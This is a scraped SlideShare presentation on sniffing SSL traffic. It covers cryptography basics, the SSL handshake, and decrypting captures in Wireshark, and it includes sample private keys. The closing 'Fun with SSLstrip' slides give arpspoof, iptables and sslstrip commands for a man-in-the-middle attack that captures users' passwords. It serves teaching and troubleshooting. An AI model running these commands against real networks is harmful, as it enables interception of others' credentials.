Sniffing SSL Traffic
Challenges <ul><li>Confidentiality </li></ul><ul><ul><li>Encryption and Decryption </li></ul></ul><ul><li>Message Integrit...
Question ? <ul><li>Who… </li></ul><ul><ul><li>… troubleshooted SSL traffic before? </li></ul></ul><ul><ul><li>… decrypted ...
Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol  </li></ul><ul><li>Analyzing SSL  </li></ul><ul><li>...
Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol  </li></ul><ul><li>Analyzing SSL  </li></ul><ul><li>...
Symmetric Encryption <ul><li>Same key for encryption and decryption </li></ul><ul><li>Computatively &quot;cheap&quot; </li...
Asymmetric Encryption <ul><li>One key for encryption, second key for decryption (both keys form a pair) </li></ul><ul><li>...
Hashing / Message Digest <ul><li>Irreversible </li></ul><ul><ul><li>original text not reproducible from the digest </li></...
Message Signing <ul><li>Create digest of message </li></ul><ul><li>Encrypt digest with private key </li></ul><ul><li>Authe...
Digital Certificates <ul><li>&quot;In cryptography, a public key certificate (or identity certificate) is an electronic do...
Certificate Authorities <ul><li>Mutually trusted by sender and receiver </li></ul><ul><li>&quot;Solves&quot; key exchange ...
Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol  </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>F...
SSL History <ul><li>SSLv1 by Netscape (unreleased, 1994) </li></ul><ul><li>SSLv2 by Netscape ( v2-draft ,1994) </li></ul><...
Place in TCP/IP stack <ul><li>Between transport and application layer </li></ul><ul><li>Protocol independent </li></ul>IP ...
SSL Record Layer <ul><li>Provides fragmentation  </li></ul><ul><li>Multiple SSL messages (of one content type) per SSL Rec...
SSL Content Types <ul><li>Handshake Protocol (0x16) </li></ul><ul><ul><li>responsible for authentication and key setup </l...
Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol  </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>F...
Choosing the right settings
Analyzing the SSL handshake <ul><li>Normal RSA handshake  </li></ul><ul><li>Ephemeral RSA (or DH) handshake </li></ul><ul>...
Normal RSA handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec ...
First packet…
Analyzing the SSL record layer (1)
Random
Session ID
Cipher Suites
Server name
Server Hello
Certificate Message
Server’s Certificate
Server Hello Done
Certificate Validation
Client Key Exchange
Finally Application Data
Ephemeral RSA (or DH) handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange Change...
Server Key Exchange
Server Key Exchange
Client Authentication Client Server ServerHello ClientHello Certificate ServerHelloDone Certificate ClientKeyExchange Fini...
Client Certificate Request
Certificate Request
Certificate (C)
Certificate Verify
Caching SSL sessions <ul><li>Key negotiation &quot;expensive&quot; </li></ul><ul><li>Cache SSL sessions between TCP sessio...
Handshake of a Reused Session Client Server ServerHello ClientHello ChangeCipherSpec Finished (encrypted) ChangeCipherSpec...
SSL session reuse (new, reused and expired) Full Handshake Partial Handshake
No SSL session caching
Analyzing SSL alerts Without decryption: With decryption:
Decrypting SSL traffic <ul><li>Provide server private key to Wireshark </li></ul><ul><li>Only works when whole session (in...
Providing the server private key (1) tshark -r file.cap -o ssl.keys_list:192.168.3.3,443,http,&quot;c:key.pem&quot;  -o ss...
<ul><li>Must be in PEM format without passphrase </li></ul><ul><li>… or PKCS12 format (passphrase allowed) </li></ul><ul><...
Converting keys root@mgmt# openssl rsa -in encrypted.key -out cleartext.key Enter pass phrase for encrypted.key: <passphra...
Decryption in Action
Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol  </li></ul><ul><li>Analyzing SSL  </li></ul><ul><li>...
Preparation of the proxy <ul><li>First we make sure that we are making routing and nat; </li></ul><ul><li>deniz@pt1:~#  ca...
Man in the middle starts <ul><li>We are sending spoofed arp addresses to default gateway and to the target machine; </li><...
SSL Strip <ul><li>We are now starting SSL Strip proxy; </li></ul><ul><li>./sslstrip –l 8080 </li></ul>
Screenshot from browser…
Here is the user and password from logs Tail –f sslstrip.log
Questions & Discussion ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Thank you…
Upcoming SlideShare
Loading in …5
×

Sniffing SSL Traffic

11,123
-1

Published on

Published in: Technology, Education
1 Comment
2 Likes
Statistics
Notes
  • nice slides
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
11,123
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
180
Comments
1
Likes
2
Embeds 0
No embeds

No notes for slide
  • Mostly used for bulk encryption How to exchange keys?
  • public-private key Mostly used for secure key exchanges How to verify keys?
  • Sniffing SSL Traffic

    1. 1. Sniffing SSL Traffic
    2. 2. Challenges <ul><li>Confidentiality </li></ul><ul><ul><li>Encryption and Decryption </li></ul></ul><ul><li>Message Integrity </li></ul><ul><ul><li>Message Digest and Message Signing </li></ul></ul><ul><li>Endpoint Authentication & Nonrepudiation </li></ul><ul><ul><li>Certificates and Certificate Authorities </li></ul></ul>SSL
    3. 3. Question ? <ul><li>Who… </li></ul><ul><ul><li>… troubleshooted SSL traffic before? </li></ul></ul><ul><ul><li>… decrypted SSL traffic before? </li></ul></ul><ul><ul><li>… and ran into problems decrypting? </li></ul></ul><ul><ul><li>… knows the purpose of each handshake message? </li></ul></ul><ul><ul><li>… troubleshooted client authentication problems? </li></ul></ul>
    4. 4. Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>Fun with SSLstrip </li></ul><ul><li>Questions & Discussion </li></ul>
    5. 5. Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>Fun with SSLstrip </li></ul><ul><li>Questions & Discussion </li></ul>
    6. 6. Symmetric Encryption <ul><li>Same key for encryption and decryption </li></ul><ul><li>Computatively &quot;cheap&quot; </li></ul><ul><li>Short keys (typically 40-256 bits) </li></ul><ul><li>DES, 3DES, AESxxx, RC4 </li></ul>
    7. 7. Asymmetric Encryption <ul><li>One key for encryption, second key for decryption (both keys form a pair) </li></ul><ul><li>Computatively &quot;expensive&quot; </li></ul><ul><li>Long keys (typically 512-4096 bits) </li></ul><ul><li>RSA, DSA </li></ul>
    8. 8. Hashing / Message Digest <ul><li>Irreversible </li></ul><ul><ul><li>original text not reproducible from the digest </li></ul></ul><ul><li>Collision-resistance </li></ul><ul><ul><li>&quot;Not possible&quot; to create a message M' so that it has the same digest as message M </li></ul></ul><ul><li>MD5, SHA-1, SHA-2 </li></ul>4fe7ad41
    9. 9. Message Signing <ul><li>Create digest of message </li></ul><ul><li>Encrypt digest with private key </li></ul><ul><li>Authenticity and sender of message can be checked with public key </li></ul>4fe7ad41 3e7bc46a 4fe7ad41 4fe7ad41 3e7bc46a = ?
    10. 10. Digital Certificates <ul><li>&quot;In cryptography, a public key certificate (or identity certificate) is an electronic document which utilizes a digital signature to bind together a public key with an identity.&quot; </li></ul><ul><li>(From http://en.wikipedia.org/wiki/Digital_certificate) </li></ul><ul><li>But who is signing??? </li></ul>
    11. 11. Certificate Authorities <ul><li>Mutually trusted by sender and receiver </li></ul><ul><li>&quot;Solves&quot; key exchange problems </li></ul><ul><li>CA's can be chained </li></ul><ul><li>Top of chain is &quot;self-signed&quot; (and is called the &quot;Root CA&quot;) </li></ul>
    12. 12. Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>Further reading & Links </li></ul><ul><li>Questions & Discussion </li></ul>
    13. 13. SSL History <ul><li>SSLv1 by Netscape (unreleased, 1994) </li></ul><ul><li>SSLv2 by Netscape ( v2-draft ,1994) </li></ul><ul><li>SSLv3 by Netscape ( v3-draft , 1995) </li></ul><ul><li>TLSv1.0, IETF ( RFC 2246 , 1999) </li></ul><ul><li>TLSv1.1, IETF ( RFC 4346 , 2006) </li></ul><ul><li>TLSv1.2, IETF ( RFC 5246 , 2008) </li></ul>
    14. 14. Place in TCP/IP stack <ul><li>Between transport and application layer </li></ul><ul><li>Protocol independent </li></ul>IP TCP HTTP SMTP … SSL/TLS SSL record layer handshake change cipherspec application data alert
    15. 15. SSL Record Layer <ul><li>Provides fragmentation </li></ul><ul><li>Multiple SSL messages (of one content type) per SSL Record allowed </li></ul><ul><li>SSL Record can be split over multiple TCP-segments </li></ul><ul><li>One TCP-segment can contain multiple SSL Records (or fragments) </li></ul>
    16. 16. SSL Content Types <ul><li>Handshake Protocol (0x16) </li></ul><ul><ul><li>responsible for authentication and key setup </li></ul></ul><ul><li>Change Cipher Spec Protocol (0x14) </li></ul><ul><ul><li>Notify start of encryption </li></ul></ul><ul><li>Alert Protocol (0x15) </li></ul><ul><ul><li>Reporting of warnings and fatal errors </li></ul></ul><ul><li>Application Protocol (0x17) </li></ul><ul><ul><li>Actual encryption and transport of data </li></ul></ul>
    17. 17. Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>Fun with SSLstrip </li></ul><ul><li>Questions & Discussion </li></ul>
    18. 18. Choosing the right settings
    19. 19. Analyzing the SSL handshake <ul><li>Normal RSA handshake </li></ul><ul><li>Ephemeral RSA (or DH) handshake </li></ul><ul><li>SSL session with client authentication </li></ul><ul><li>Reusing SSL sessions </li></ul><ul><ul><li>Reused SSL session (partial handshake) </li></ul></ul><ul><ul><li>Expired SSL session </li></ul></ul><ul><ul><li>No SSL reuse </li></ul></ul>
    20. 20. Normal RSA handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
    21. 21. First packet…
    22. 22. Analyzing the SSL record layer (1)
    23. 23. Random
    24. 24. Session ID
    25. 25. Cipher Suites
    26. 26. Server name
    27. 27. Server Hello
    28. 28. Certificate Message
    29. 29. Server’s Certificate
    30. 30. Server Hello Done
    31. 31. Certificate Validation
    32. 32. Client Key Exchange
    33. 33. Finally Application Data
    34. 34. Ephemeral RSA (or DH) handshake Client Server ServerHello ClientHello Certificate ServerHelloDone ClientKeyExchange ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted) ServerKeyExchange
    35. 35. Server Key Exchange
    36. 36. Server Key Exchange
    37. 37. Client Authentication Client Server ServerHello ClientHello Certificate ServerHelloDone Certificate ClientKeyExchange Finished (encrypted) ChangeCipherSpec Finished (encrypted) CertificateRequest CertificateVerify ChangeCipherSpec
    38. 38. Client Certificate Request
    39. 39. Certificate Request
    40. 40. Certificate (C)
    41. 41. Certificate Verify
    42. 42. Caching SSL sessions <ul><li>Key negotiation &quot;expensive&quot; </li></ul><ul><li>Cache SSL sessions between TCP sessions and continue where left off </li></ul><ul><li>SSL session ID is used as Index </li></ul><ul><li>Timeout on SSL session ID is an &quot;absolute timeout&quot; not an &quot;idle timeout&quot; </li></ul><ul><ul><li>Old IE: 2 minutes, now 10 hours </li></ul></ul>
    43. 43. Handshake of a Reused Session Client Server ServerHello ClientHello ChangeCipherSpec Finished (encrypted) ChangeCipherSpec Finished (encrypted)
    44. 44. SSL session reuse (new, reused and expired) Full Handshake Partial Handshake
    45. 45. No SSL session caching
    46. 46. Analyzing SSL alerts Without decryption: With decryption:
    47. 47. Decrypting SSL traffic <ul><li>Provide server private key to Wireshark </li></ul><ul><li>Only works when whole session (including full handshake) is in the tracefile </li></ul><ul><li>Does not work with Ephemeral RSA or DH ciphers (ServerKeyExchange present) </li></ul><ul><li>Also works with Client Authentication </li></ul>
    48. 48. Providing the server private key (1) tshark -r file.cap -o ssl.keys_list:192.168.3.3,443,http,&quot;c:key.pem&quot; -o ssl.debug_file:&quot;c:ssl-debug.log&quot; -V -R http ssl.keys_list: 192.168.3.3,443,http,c:key.pem ssl.debug_file: c: empssl-debug.log Wireshark preferences file: When using Tshark:
    49. 49. <ul><li>Must be in PEM format without passphrase </li></ul><ul><li>… or PKCS12 format (passphrase allowed) </li></ul><ul><ul><li>File is binary </li></ul></ul>Providing the server private key (2) PEM keyfile *with* passphrase: -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,F6C218D4FA3C8B66 FR2cnmkkFHH45Dcsty1qDiIUy/uXn+9m/xeQMVRxtiSAmBmnUDUFIFCDDiDc9yif ERok2jPr2BzAazl5RBxS2TY/+7x0/dHD11sF3LnJUoNruo77TERxqgzOI0W1VDRA ... ygw5JslxgiN18F36E/cEP5rKvVYvfEPMa6IsiRhfZk1jLAuZihVWc7JodDf+6RKV yBXrK/bDtdEih+bOnYu+ZDvjAzVz9GhggCW4QHNboDpTxrrYPkj5Nw== -----END RSA PRIVATE KEY----- PEM keyfile *without* passphrase: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQDrHdbb+yGE6m6EZ03bXURpZCjch2H6g97ZAkJVGrjLZFfettBA EYa8vYYxWsf8KBpEZeksSCsDA9MnU2H6QDjzqdOnaSWfeXMAr4OsCOpauStpreq7 q1hk8iOqy+f4KijRrhWplh1QW1A8gtSIg137pyUhW+WsfwxKwmzjGIC1SwIDAQAB AoGBAMneA9U6KIxjb+JUg/99c7h9W6wEvTYHNTXjf6psWA+hpuQ82E65/ZJdszL6 ... b6QKMh16r5wd6smQ+CmhOEnqqyT5AIwwl2RIr9GbfIpTbtbRQw/EcQOCx9wFiEfo tGSsEFi72rHK+DpJqRI9AkEA72gdyXRgPfGOS3rfQ3DBcImBQvDSCBa4cuU1XJ1/ MO93a8v9Vj87/yDm4xsBDsoz2PyBepawHVlIvZ6jDD0aXw== -----END RSA PRIVATE KEY----- ssl_init keys string: 192.168.3.3,443,http,c: emppublic.sharkfest.local.key ssl_init found host entry 192.168.3.3,443,http,c: emppublic.sharkfest.local.key ssl_init addr '192.168.3.3' port '443' filename 'c: emppublic.sharkfest.local.key' password(only for p12 file) '(null)' ssl_load_key: can't import pem data SSL debug log:
    50. 50. Converting keys root@mgmt# openssl rsa -in encrypted.key -out cleartext.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# root@mgmt# openssl pkcs12 -in pem.cert -inkey pem.key -export -out cert.pkcs12 Enter Export Password: <new-passphrase> Verifying - Enter Export Password: <new-passphrase> root@mgmt# root@mgmt# openssl rsa -inform DER -in der.key -out pem.key Enter pass phrase for encrypted.key: <passphrase> writing RSA key root@mgmt# Removing passphrase: Converting from DER to PEM (and removing passphrase): Converting from PEM to PKCS12 (and adding passphrase):
    51. 51. Decryption in Action
    52. 52. Agenda <ul><li>Cryptology overview </li></ul><ul><li>The SSL protocol </li></ul><ul><li>Analyzing SSL </li></ul><ul><li>Fun with SSLstrip </li></ul><ul><li>Questions & Discussion </li></ul>
    53. 53. Preparation of the proxy <ul><li>First we make sure that we are making routing and nat; </li></ul><ul><li>deniz@pt1:~# cat /proc/sys/net/ipv4/ip_forward </li></ul><ul><li>0 </li></ul><ul><li>deniz@pt1 :~# echo &quot;1&quot; > /proc/sys/net/ipv4/ip_forward </li></ul><ul><li>deniz@pt1 :~# cat /proc/sys/net/ipv4/ip_forward </li></ul><ul><li>1 </li></ul><ul><li>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 </li></ul>
    54. 54. Man in the middle starts <ul><li>We are sending spoofed arp addresses to default gateway and to the target machine; </li></ul><ul><li>arpspoof –i eth0 –t 192.168.11.231 192.168.11.244 </li></ul>
    55. 55. SSL Strip <ul><li>We are now starting SSL Strip proxy; </li></ul><ul><li>./sslstrip –l 8080 </li></ul>
    56. 56. Screenshot from browser…
    57. 57. Here is the user and password from logs Tail –f sslstrip.log
    58. 58. Questions & Discussion ? ? ? ? ? ? ? ? ? ? ? ? ? ?
    59. 59. Thank you…
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×